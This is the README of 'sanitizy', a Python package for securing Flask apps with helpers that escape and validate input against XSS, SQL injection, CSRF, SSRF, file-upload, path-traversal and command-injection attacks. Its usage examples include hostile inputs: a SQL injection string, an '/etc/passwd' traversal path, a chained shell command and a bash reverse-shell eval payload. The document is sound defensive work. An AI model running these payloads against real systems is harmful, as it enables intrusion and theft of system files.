AlaBouali/sanitizy
Sanitizy

This is a simple and very lightweight Python package to help secure Python web applications in general, and Flask apps in particular, since they ship with few security checks of their own !!

Usage:

XSS:

Escape some value:

from sanitizy import *

XSS.escape('<h1>')  # produces: '&lt;h1&gt;'

Escape all of Flask's GET parameters:

XSS.escape_args(request)  # produces a dict with escaped values

Escape all of Flask's POST parameters:

XSS.escape_form(request)  # produces a dict with escaped values

SQL-Injection:

Escape some value:

from sanitizy import *

SQLI.escape("' or 1=1 or '")  # produces: "\' or 1=1 or \'"

Escape all of Flask's GET parameters:

SQLI.escape_args(request)  # produces a dict with escaped values

Escape all of Flask's POST parameters:

SQLI.escape_form(request)  # produces a dict with escaped values

CSRF:

Check if the request is coming from the application itself or not:

CSRF.validate("http://www.google.com", ["www.google.com", "www.bing.com"])  # takes the Referer header value and a list of allowed domains, then returns True if it's safe and False if not

Check if the request is coming from the Flask application itself or not:

CSRF.validate_flask(request)  # returns True if it's safe and False if not

SSRF:

Validate whether the URL could lead to an SSRF:

SSRF.validate("http://localhost:22", url=True)  # returns True if it's safe and False if not

Validate whether the domain could lead to an SSRF:

SSRF.validate("localhost:22", url=False)  # returns True if it's safe and False if not
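To make the SSRF check above concrete, here is an added, self-contained reference implementation of the same idea (written for this README, not sanitizy's own code): parse the target, refuse non-HTTP schemes and localhost names, then reject any address that is not globally routable. The names `is_safe_target` and `resolver` are this example's own, and the resolver is injectable so the check can be exercised offline.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Hypothetical helper names for this example; not part of sanitizy.
LOCAL_NAMES = ("localhost", "localhost.localdomain")


def dns_resolve(host):
    """Default resolver: every address the system resolver returns for host."""
    return [info[4][0] for info in socket.getaddrinfo(host, None)]


def is_safe_target(value, url=True, resolver=dns_resolve):
    """Mirror of the SSRF.validate contract: True when `value` (a full URL, or a
    host[:port] when url=False) points at a public address, False otherwise."""
    if url:
        parts = urlsplit(value)
        if parts.scheme not in ("http", "https"):
            return False  # file://, gopher://, dict:// and friends are never safe
        host = parts.hostname
    else:
        # Reuse the URL parser so "host:port" and "[v6]:port" forms are handled.
        host = urlsplit("//" + value).hostname
    if not host:
        return False
    host = host.lower()
    if host in LOCAL_NAMES or host.endswith(".localhost"):
        return False
    try:
        addrs = [ipaddress.ip_address(host)]  # literal IP, no DNS needed
    except ValueError:
        try:
            addrs = [ipaddress.ip_address(a) for a in resolver(host)]
        except (OSError, ValueError):
            return False  # unresolvable or malformed: fail closed
    # Private, loopback, link-local (cloud metadata lives there), reserved and
    # unspecified ranges all report is_global == False.
    return all(ip.is_global for ip in addrs)
```

Note that a name that resolves to a public address at check time can resolve differently when the request is actually made (DNS rebinding), so the address checked here should be the one the outbound connection is pinned to.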

File Upload:

Check if the file is safe or not:

FILE_UPLOAD.check_file(request.files['file'], allowed_extensions=['png', 'jpg', 'jpeg', 'gif', 'pdf'], allowed_mimetypes=["application/pdf", "application/x-pdf", "image/png", "image/jpg", "image/jpeg"])  # returns True if it's safe and False if not

Save files securely:

FILE_UPLOAD.save_file(request.files['file'], path="uploads/")  # returns the path to the uploaded file

Path Traversal:

Check if the file is safe to open/download or not:

PATH_TRAVERSAL.check("../../../../../../etc/passwd")  # returns True if it's safe and False if not

RCE (Remote Code/Command Execution):

Check whether a value is safe to pass to a command or not:

RCE.command("ls -a ;cat /etc/passwd ")  # returns True if it's safe and False if not

Check whether a value is safe to pass to an "eval" function or not:

RCE.eval("__import__('os').system('bash -i >& /dev/tcp/10.0.0.1/8080 0>&1")  # returns True if it's safe and False if not

Validate User Inputs:

Check if a value contains letters only:

FORM_INPUTS.alphabet("ala bouali", length=(1, 50))  # returns True if it's correct and False if not

Check if a value contains digits only:

FORM_INPUTS.numeric("233 21 4", length=(1, 15))  # returns True if it's correct and False if not

Check if a value is alphanumeric:

FORM_INPUTS.alphanumeric(" ala bOuali12 56", length=(1, 50))  # returns True if it's correct and False if not

Check if a value is an email address:

FORM_INPUTS.email("alabouali@gmail.com", length=(6, 15))  # returns True if it's correct and False if not

Check if a value is a phone number:

FORM_INPUTS.phone_number("+123456789", length=(6, 15))  # returns True if it's correct and False if not

Check if a value is a long enough password:

FORM_INPUTS.password("fvccabah$vhj", length=(8, 15))  # returns True if it's correct and False if not

Check if two passwords match and are long enough:

FORM_INPUTS.passwords_match("fvccabah$vhj", "fvccabah$234", length=(8, 15))  # returns True if it's correct and False if not

Check if a value matches a specific regex:

FORM_INPUTS.regex_match("alabouali@gmail.com", r'\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}\b', length=(6, 15))  # returns True if it's correct and False if not
